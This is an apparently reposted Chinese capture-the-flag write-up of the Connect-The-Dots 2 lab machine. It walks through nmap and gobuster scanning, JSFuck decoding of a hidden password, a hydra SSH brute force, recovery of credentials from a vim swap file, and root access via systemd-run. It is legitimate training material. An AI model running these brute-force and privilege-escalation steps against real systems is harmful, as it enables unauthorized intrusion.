Connect-The-Dots_2

Connect-The-Dots_2

一、主機發現和端口掃描

  • 主機發現,靶機地址192.168.80.148

    arp-scan -l
    

    在這里插入圖片描述

  • 端口掃描

    nmap -A -p- -sV 192.168.80.148開放端口
    21/tcp    open  ftp      vsftpd 2.0.8 or later
    80/tcp    open  http     Apache httpd 2.4.38 ((Debian))
    111/tcp   open  rpcbind  2-4 (RPC #100000)
    2049/tcp  open  nfs      3-4 (RPC #100003)
    7822/tcp  open  ssh      OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
    33741/tcp open  nlockmgr 1-4 (RPC #100021)
    39565/tcp open  mountd   1-3 (RPC #100005)
    56517/tcp open  mountd   1-3 (RPC #100005)
    58767/tcp open  mountd   1-3 (RPC #100005)
    

    在這里插入圖片描述

二、信息收集

  • 訪問80端口

    Happy Birthday brother!You know how our family have named us, right? Them naming me M and you N. Well, our names are entirely the same except the initials. Life is too short to save names in your memory when you're old, so why not! But do you know who did that? Our mother who was fond of the James Bond movies. She named me after her as M. Perhaps, she thinks that the director of the movie was too lazy to think of one. I mean, who cares, right? Haha, I know you don't like me neither my pesky jokes. But I love you brother. So, don't visit this website until I am done. You'll find nothing but backups, lol.Btw, I know you love challenges so I have something in store for you as well.翻譯
    生日快樂,兄弟!你知道我們家是怎么給我們取名的吧?他們叫我M,叫你n。嗯,我們的名字除了首字母外完全一樣。生命太短暫了,當你老了的時候,為什么不把名字保存在你的記憶里呢?但你知道是誰干的嗎?我們的母親非常喜歡詹姆斯·邦德的電影。她以她的名字給我取名叫m。也許,她認為電影的導演太懶了,想不出一個名字。我是說,誰在乎呢?哈哈,我知道你不喜歡我,也不喜歡我那些討厭的笑話。但是我愛你,兄弟。所以,在我完成之前不要訪問這個網站。除了備份你什么都找不到,哈哈。順便說一句,我知道你喜歡挑戰,所以我也為你準備了一些東西。
    

    在這里插入圖片描述

  • 路徑掃描

    gobuster dir -u http://192.168.80.148 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php -t 50路徑
    /images               (Status: 301) [Size: 317] [--> http://192.168.80.148/images/]
    /manual               (Status: 301) [Size: 317] [--> http://192.168.80.148/manual/]
    /javascript           (Status: 301) [Size: 321] [--> http://192.168.80.148/javascript/]
    /backups              (Status: 200) [Size: 6301]
    /mysite               (Status: 301) [Size: 317] [--> http://192.168.80.148/mysite/]
    

    在這里插入圖片描述

  • 訪問/backups,就一個3s視頻

    在這里插入圖片描述

  • 訪問/mysite,發現bootstrap.min.cs文件存在加密的東西

    在這里插入圖片描述

  • 使用腳本將文件的字符串搞下來

    #coding=utf-8
    import requests
    import rereq = requests.get("http://192.168.80.148/mysite/bootstrap.min.cs").text
    data = re.findall('\s=\s\"(.*?)\"',req)print("".join(data))
    
  • 進行JSfuck解碼

    http://www.liminba.com/tool/jsfuckdecode/alert("You're smart enough to understand me. Here's your secret, TryToGuessThisNorris@2k19")TryToGuessThisNorris@2k19可能是密碼
    

    在這里插入圖片描述

三、NFS滲透

  • 因為開放了2049端口,獲取 nfs 服務器的目錄列列表

    showmount -e 192.168.80.148得到用戶名 morris
    

    在這里插入圖片描述

  • 嘗試掛載共享目錄,沒成功

    mount -t nfs 192.168.80.148:/home/morris dots
    

    在這里插入圖片描述

四、爆破SSH

  • 得到一個用戶名為morris,根據主頁的提示,應該還一個用戶名norris,嘗試ssh爆破

    用戶名:
    morris
    norris
    Morris
    Norris密碼:
    TryToGuessThisNorris@2k19hydra -L /tmp/user -p TryToGuessThisNorris@2k19 192.168.80.148 ssh -s 7822 -vV
    

    在這里插入圖片描述

  • 登錄ssh

    ssh norris@192.168.80.148 -p 7822
    

    在這里插入圖片描述

    在這里插入圖片描述

五、二次信息收集

  • 登錄ftp下載文件

    ftp 192.168.80.148
    

    在這里插入圖片描述

  • 查看圖片信息,發現摩斯密碼

    exiftool game.jpg.bak.... . -.-- ....... -. --- .-. .-. .. ... --..-- ....... -.-- --- ..- .----. ...- . ....... -- .- -.. . ....... - .... .. ... ....... ..-. .- .-. .-.-.- ....... ..-. .- .-. ....... ..-. .- .-. ....... ..-. .-. --- -- ....... .... . .- ...- . -. ....... .-- .- -. -. .- ....... ... . . ....... .... . .-.. .-.. ....... -. --- .-- ..--.. ....... .... .- .... .- ....... -.-- --- ..- ....... ... ..- .-. . .-.. -.-- ....... -- .. ... ... . -.. ....... -- . --..-- ....... -.. .. -.. -. .----. - ....... -.-- --- ..- ..--.. ....... --- .... ....... -.. .- -- -. ....... -- -.-- ....... -... .- - - . .-. -.-- ....... .. ... ....... .- -... --- ..- - ....... - --- ....... -.. .. . ....... .- -. -.. ....... .. ....... .- -- ....... ..- -. .- -... .-.. . ....... - --- ....... ..-. .. -. -.. ....... -- -.-- ....... -.-. .... .- .-. --. . .-. ....... ... --- ....... --.- ..- .. -.-. -.- .-.. -.-- ....... .-.. . .- ...- .. -. --. ....... .- ....... .... .. -. - ....... .. -. ....... .... . .-. . ....... -... . ..-. --- .-. . ....... - .... .. ... ....... ... -.-- ... - . -- ....... ... .... ..- - ... ....... -.. --- .-- -. ....... .- ..- - --- -- .- - .. -.-. .- .-.. .-.. -.-- .-.-.- ....... .. ....... .- -- ....... ... .- ...- .. -. --. ....... - .... . ....... --. .- - . .-- .- -.-- ....... - --- ....... -- -.-- ....... -.. ..- -. --. . --- -. ....... .. -. ....... .- ....... .----. ... . -.-. .-. . - ..-. .. .-.. . .----. ....... .-- .... .. -.-. .... ....... .. ... ....... .--. ..- -... .-.. .. -.-. .-.. -.-- ....... .- -.-. -.-. . ... ... .. -... .-.. . .-.-.-
    

    在這里插入圖片描述

  • 解碼

    HEY NORRIS, YOU'VE MADE THIS FAR. FAR FAR FROM HEAVEN WANNA SEE HELL NOW? HAHA YOU SURELY MISSED ME, DIDN'T YOU? OH DAMN MY BATTERY IS ABOUT TO DIE AND I AM UNABLE TO FIND MY CHARGER SO QUICKLY LEAVING A HINT IN HERE BEFORE THIS SYSTEM SHUTS DOWN AUTOMATICALLY. I AM SAVING THE GATEWAY TO MY DUNGEON IN A 'SECRETFILE' WHICH IS PUBLICLY ACCESSIBLE.諾里斯,你已經走了這么遠了。遠離天堂,現在想看看地獄嗎?哈哈,你肯定想我了,是嗎?哦,該死的,我的電池快沒電了,我找不到充電器這么快,在系統自動關閉之前在這里留下一個提示。我將地下城的入口保存在一個公開訪問的“秘密文件”中。
    

    在這里插入圖片描述

  • 尋找morris密碼,在/var/www/html目錄下發現一個secretfile 文件

    I see you're here for the password. Holy Moly! Battery is dying !! Mentioning below for reference.我看你是來要密碼的。神圣的魔草!電池快沒電了!!以下提及供參考。
    

    在這里插入圖片描述

  • 查看所有文件,發現.secretfile.swp文件,swp 是編輯器突然斷電或者 ctrl+z 產生的文件

    在這里插入圖片描述

  • 將文件下載下來,發現密碼blehguessme090

    在這里插入圖片描述

  • 登錄ssh

    morris:blehguessme090ssh morris@192.168.80.148 -p 7822
    

    在這里插入圖片描述

六、權限提升

  • systemd-run提權

    systemd-run -t /bin/bash輸入TryToGuessThisNorris@2k19
    

    在這里插入圖片描述

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/news/160779.shtml
繁體地址,請注明出處:http://hk.pswp.cn/news/160779.shtml
英文地址,請注明出處:http://en.pswp.cn/news/160779.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

循環隊列詳解!!c 語言版本(兩種方法)雙向鏈表和數組法!!

目錄 1.什么是循環隊列 2.循環隊列的實現(兩種方法) 第一種方法 數組法 1.源代碼 2.源代碼詳解!! 1.創造隊列空間和struct變量 2.隊列判空 3.隊列判滿(重點) 4.隊列的元素插入 5.隊列的元素刪除 …

GIT實踐與常用命令---回退

實踐場景 場景1 回退提交 在日常工作中,我們可能會和多個同事在同一個分支進行開發,有時候我們可能會出現一些錯誤提交,這些錯誤提交如果想撤銷,可以有兩種解決辦法:回退( reset )、反做(revert) keywords:reset、rev…

2023軟件測試的4個技術等級,你在哪個級別?

最近,我們討論了軟件測試工程的的分級,大家都貢獻了自己的想法,對于大家來說,軟件測試人的分級其實也代表了我們的進階方向,職業發展。總體來說,測試工程師未來發展有三個方向: 技術精英 行業專…

層次分析法--可以幫助你做決策的簡單算法

作用 層次分析法是一個多指標的評價算法,主要用來在做決策時,給目標的多個影響因子做權重評分。特別是那些需要主觀決策的、或者需要用經驗判斷的決策方案,例如: 買房子(主觀決策)選擇旅游地(…

android11 申請所有文件訪問權限

Android 11 引入了強制執行分區存儲的限制,導致應用默認不能訪問外部文件。 針對以前涉及較多文件的操作,可采用申請所有文件訪問權限的方式來解決這一問題,實現方式如下。 (雖然這樣做安全性低,官方并不推薦這樣&…

preplexity test

Preplexity test can use model claude and gpt-4, feel speed is ok and only for $10 with coupon (below give a link). Feel ok to try reference link: https://perplexity.ai/pro?referral_codeV6UOS5PH

Shell判斷:模式匹配:case(三)

系統管理工具箱 1、需求:Linux提供的豐富的管理命令,用戶管理,內存管理,磁盤管理,進程管理,日志管理,文件管理,軟件管理,網絡管理等等數十個工具包。如果你能通過shell編…

【代碼隨想錄】算法訓練計劃30

【代碼隨想錄】算法訓練計劃30 1、51. N 皇后 按照國際象棋的規則,皇后可以攻擊與之處在同一行或同一列或同一斜線上的棋子。 n 皇后問題 研究的是如何將 n 個皇后放置在 nn 的棋盤上,并且使皇后彼此之間不能相互攻擊。 給你一個整數 n ,…

微信API:探究Android平臺下Hook技術的比較與應用場景分析

微信API:探究Android平臺下Hook技術的比較與應用場景分析 正文: 在Android平臺開發中,Hook技術是一種常用的技術手段,用于在運行時修改應用程序的行為。下面對一些常見的Hook技術進行比較,并分析它們的適用場景和優缺…

信息系統項目管理師論文

軟考官網:中國計算機技術職業資格網 (ruankao.org.cn) 2020年 2020年下半年試題一:論信息系統項目的成本管理 2019年 2019年下半年試題一:論信息系統項目的整體管理 2019年下半年試題二:論信息系統項目的溝通管理

PCI5565反射內存網技術的應用研究

隨著嵌入式與通信技術的發展,數控系統經歷了由傳統的單處理器的集中式體系結構到開放式體系結構,再到多處理器的分布式數控系統體系結構的發展過程。分布式數控系統以高精、高速的加工特征為發展核心,同時以達到異構網絡間信息的無縫融合&…

分布式鎖3: zk實現分布式鎖

一 zk 實現分布式鎖 1.1 zk分布式操作命令 1.指令: ls / get /zookeeper create /aa "test" delete /aa set /aa "test1" 2..znode節點類型: 永久節點:create /pa…

優秀智慧園區案例 - 上海世博文化公園智慧園區,先進智慧園區建設方案經驗

一、項目背景 世博文化公園是上海的綠色新地標,是生態自然永續、文化融合創新、市民歡聚共享的大公園。作為世博地區的城市更新項目,世博文化公園的建設關乎上海城市風貌、上海文化展示、城市生態環境、市民游客體驗、上海服務品牌等,被賦予…

依托數據、平臺、知識增強等優勢 夸克大模型大幅降低問答幻覺率

“大模型時代,夸克有巨大機會創造出革新性搜索產品。”11月22日,夸克大模型公布了其面向搜索、生產力工具和資產管理助手的大模型技術布局。數據顯示,夸克千億級參數大模型登頂C-Eval和CMMLU兩大權威榜單,夸克百億級參數大模型同樣…

電大搜題——讓學習變得輕松高效

作為一名現代學者,您一定時刻關注著教育領域的進展和創新。今天,我將向大家介紹一個名為“電大搜題”的神奇工具,它將為您的學習之路帶來一場完美的革命。 在快節奏的現代社會中,學習已經成為每個人追求成功的必經之路。然而&…

【數據結構】動態順序表詳解

目錄 1.順序表的概念及結構 2.動態順序表的實現 2.1創建新項目 2.2動態順序表的創建 2.3接口的實現及測其功能 2.3.1初始化 2.3.2尾插 2.3.3頭插 2.3.4尾刪&頭刪 2.3.5打印&從任意位置插入 2.3.6刪除任意位置的數據 2.3.7查找 2.3.8銷毀順序表 3.結語 He…

【交易誤區】初學者常犯的MT4外匯交易錯誤有哪些?

作為初學者,踏入外匯交易市場時,往往會陷入一些常見的誤區,導致交易效果不佳甚至遭受損失。在本文中,我將列舉并解釋五個初學者常見的MT4外匯交易錯誤,并提供相應的解決方案,幫助您避免這些錯誤&#xff0c…

java項目之社區互助平臺(ssm+vue)

項目簡介 社區互助平臺實現了以下功能: 1、一般用戶的功能及權限 所謂一般用戶就是指還沒有注冊的過客,他們可以瀏覽主頁面上的信息。但如果有中意的社區互助信息時,要登錄注冊,只有注冊成功才有的權限。2、管理員的功能及權限 用戶信息的添…

react大文件上傳

目錄 大文件上傳優點: 大文件上傳缺點: 大文件上傳原理: 為什么要用md5 實現流程: 部分代碼1: 部分代碼2:? 大文件上傳優點: 文件太大分片上傳能加快上傳速度,提高用戶體驗能斷點續傳 如果上次上傳失敗…

簡單工程模式

代碼實現 //simpleFactory.h #ifndef _SimpleFactory_H_ #define _SimpleFactory_H_#include <iostream> #include <exception> #include <string>using namespace std;class Operation { protected:double _numberA 0;double _numberB 0; public:Operat…